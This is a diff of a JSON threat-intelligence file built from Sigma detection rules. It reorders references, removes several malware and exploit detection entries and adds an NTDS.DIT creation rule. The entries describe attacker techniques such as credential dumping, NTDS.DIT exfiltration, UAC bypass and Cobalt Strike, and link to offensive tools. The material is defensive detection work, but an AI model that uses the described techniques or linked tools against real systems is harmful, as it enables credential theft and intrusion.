+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a05baa88-e922-4001-bc4d-8738135f27de",
+ "value": "Process Monitor Driver Creation By Non-Sysinternals Binary"
+ },
{
"description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.",
"meta": {
@@ -37261,8 +37266,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/",
"https://cobalt.io/blog/kerberoast-attack-techniques",
+ "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml"
],
"tags": [
@@ -37295,8 +37300,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py",
"https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/",
+ "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml"
],
"tags": [
@@ -37446,8 +37451,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml"
],
"tags": [
@@ -37547,8 +37552,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml"
],
"tags": [
@@ -37603,43 +37608,7 @@
"value": "UAC Bypass Using NTFS Reparse Point - File"
},
{
- "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/03/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_ntds_dit.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
- "https://pentestlab.blog/tag/ntds-dit/",
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d",
- "value": "Suspicious NTDS.DIT Creation"
- },
- {
- "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration",
+ "description": "Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.",
"meta": {
"author": "Florian Roth (Nextron Systems)",
"creation_date": "2022/03/11",
@@ -37671,7 +37640,7 @@
}
],
"uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a",
- "value": "Suspicious NTDS Exfil Filename Patterns"
+ "value": "NTDS Exfiltration Filename Patterns"
},
{
"description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n",
@@ -37710,8 +37679,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20",
"https://twitter.com/vanitasnk/status/1437329511142420483?s=21",
+ "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml"
],
"tags": [
@@ -37869,11 +37838,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/search?q=CVE-2021-36934",
- "https://www.google.com/search?q=%22reg.exe+save%22+sam",
- "https://github.com/FireFart/hivenightmare",
"https://github.com/HuskyHacks/ShadowSteal",
+ "https://github.com/search?q=CVE-2021-36934",
+ "https://github.com/FireFart/hivenightmare",
"https://github.com/cube0x0/CVE-2021-36934",
+ "https://www.google.com/search?q=%22reg.exe+save%22+sam",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml"
],
"tags": [
@@ -37893,40 +37862,6 @@
"uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0",
"value": "Potential SAM Database Dump"
},
- {
- "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_moriya_rootkit.yml",
- "level": "critical",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88",
- "value": "Moriya Rootkit"
- },
{
"description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)",
"meta": {
@@ -38062,41 +37997,6 @@
"uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8",
"value": "UAC Bypass Abusing Winsat Path Parsing - File"
},
- {
- "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n",
- "meta": {
- "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
- "creation_date": "2021/10/25",
- "falsepositive": [
- "Legitimate downloads of \".vhd\" files would also trigger this"
- ],
- "filename": "file_event_win_mal_vhd_download.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
- "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8468111a-ef07-4654-903b-b863a80bbc95",
- "value": "Suspicious VHD Image Download From Browser"
- },
{
"description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents",
"meta": {
@@ -38200,8 +38100,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc",
+ "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml"
],
"tags": [
@@ -38311,6 +38211,39 @@
"uuid": "52753ea4-b3a0-4365-910d-36cff487b789",
"value": "Hijack Legit RDP Session to Move Laterally"
},
+ {
+ "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database)",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_ntds_dit_creation.yml",
+ "level": "low",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "0b8baa3f-575c-46ee-8715-d6f28cc7d33c",
+ "value": "NTDS.DIT Created"
+ },
{
"description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence",
"meta": {
@@ -38348,8 +38281,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63",
"https://github.com/GhostPack/SafetyKatz",
+ "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml"
],
"tags": [
@@ -38564,8 +38497,8 @@
"logsource.product": "windows",
"refs": [
"https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
"https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
+ "https://github.com/fox-it/LDAPFragger",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml"
],
"tags": [
@@ -38632,8 +38565,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://aboutdfir.com/the-key-to-identify-psexec/",
"https://twitter.com/davisrichardg/status/1616518800584704028",
+ "https://aboutdfir.com/the-key-to-identify-psexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_psexec_service_key.yml"
],
"tags": [
@@ -38720,8 +38653,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml"
],
"tags": [
@@ -38896,8 +38829,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml"
],
"tags": [
@@ -38930,8 +38863,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml"
],
"tags": [
@@ -39164,12 +39097,12 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc",
- "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
"https://github.com/Wh04m1001/SysmonEoP",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
"https://decoded.avast.io/martinchlumecky/png-steganography/",
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc",
+ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml"
],
"tags": [
@@ -39320,8 +39253,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://twitter.com/cyb3rops/status/1552932770464292864",
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml"
],
"tags": [
@@ -39343,40 +39276,6 @@
"uuid": "b6f91281-20aa-446a-b986-38a92813a18f",
"value": "DLL Search Order Hijackig Via Additional Space in Path"
},
- {
- "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/05",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "file_event_win_malware_pingback_backdoor.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
- "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_malware_pingback_backdoor.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1574.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78",
- "value": "Pingback Backdoor File Indicators"
- },
{
"description": "Detects the creation of tasks from processes executed from suspicious locations",
"meta": {
@@ -39458,8 +39357,8 @@
"logsource.category": "file_rename",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ffforward/status/1481672378639912960",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location",
+ "https://twitter.com/ffforward/status/1481672378639912960",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml"
],
"tags": "No established tags"
@@ -39921,8 +39820,8 @@
"logsource.category": "file_access",
"logsource.product": "windows",
"refs": [
- "https://github.com/lclevy/firepwd",
"https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users",
+ "https://github.com/lclevy/firepwd",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml"
],
"tags": [
@@ -39955,8 +39854,8 @@
"logsource.category": "file_access",
"logsource.product": "windows",
"refs": [
- "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist",
"https://www.passcape.com/windows_password_recovery_dpapi_credhist",
+ "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml"
],
"tags": [
@@ -40055,8 +39954,8 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/notwhickey/status/1333900137232523264",
"https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
+ "https://twitter.com/notwhickey/status/1333900137232523264",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"
],
"tags": [
@@ -40155,10 +40054,10 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows",
+ "https://redcanary.com/blog/misbehaving-rats/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml"
],
"tags": [
@@ -40191,8 +40090,8 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/",
+ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"
],
"tags": [
@@ -40254,29 +40153,6 @@
"uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b",
"value": "DNS Query for Ufile.io Upload Domain - Sysmon"
},
- {
- "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "dns_query_win_malware_3cx_compromise.yml",
- "level": "high",
- "logsource.category": "dns_query",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_malware_3cx_compromise.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8",
- "value": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS"
- },
{
"description": "Detects DNS queries for subdomains used for upload to MEGA.io",
"meta": {
@@ -40424,9 +40300,9 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
+ "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update",
"https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations",
"https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations",
- "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_malware_socgholish_second_stage_c2.yml"
],
"tags": [
@@ -40786,8 +40662,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml"
],
"tags": [
@@ -40807,32 +40683,6 @@
"uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac",
"value": "Suspicious Service DACL Modification Via Set-Service Cmdlet"
},
- {
- "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)",
- "meta": {
- "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)",
- "creation_date": "2022/06/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
- "https://twitter.com/sbousseaden/status/1531653369546301440",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion"
- ]
- },
- "uuid": "868955d9-697e-45d4-a3da-360cefd7c216",
- "value": "Potential Exploitation Attempt From Office Application"
- },
{
"description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.",
"meta": {
@@ -40846,9 +40696,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://redcanary.com/threat-detection-report/",
- "https://www.cobaltstrike.com/help-windows-executable",
"https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://www.cobaltstrike.com/help-windows-executable",
+ "https://redcanary.com/threat-detection-report/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml"
],
"tags": [
@@ -40881,8 +40731,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend",
"https://twitter.com/0gtweet/status/1638069413717975046",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml"
],
"tags": [
@@ -40939,11 +40789,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml"
],
@@ -40988,43 +40838,6 @@
"uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b",
"value": "Renamed AdFind Execution"
},
- {
- "description": "Detects potential Dtrack RAT activity via specific process patterns",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/10/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_dtrack.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/my-name-is-dtrack/93338/",
- "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
- "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/",
- "https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
- "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1490"
- ]
- },
- "related": [
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4",
- "value": "Potential Dtrack RAT Activity"
- },
{
"description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)",
"meta": {
@@ -41059,40 +40872,6 @@
"uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89",
"value": "WhoAmI as Parameter"
},
- {
- "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/07/14",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_35211_servu.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136.001",
- "cve.2021.35211"
- ]
- },
- "related": [
- {
- "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "75578840-9526-4b2a-9462-af469a45e767",
- "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322"
- },
{
"description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.",
"meta": {
@@ -41242,49 +41021,6 @@
"uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b",
"value": "Unusual Parent Process For Cmd.EXE"
},
- {
- "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/15",
- "falsepositive": [
- "Unknown but benign sub processes of the Windows DNS service dns.exe"
- ],
- "filename": "proc_creation_win_exploit_cve_2020_1350.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/",
- "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487",
- "value": "DNS RCE CVE-2020-1350"
- },
{
"description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting",
"meta": {
@@ -41328,48 +41064,6 @@
"uuid": "15619216-e993-4721-b590-4c520615a67d",
"value": "Potential Meterpreter/CobaltStrike Activity"
},
- {
- "description": "Detects Rorschach ransomware execution activity",
- "meta": {
- "author": "X__Junior (Nextron Systems)",
- "creation_date": "2023/04/04",
- "falsepositive": [
- "Unlikely"
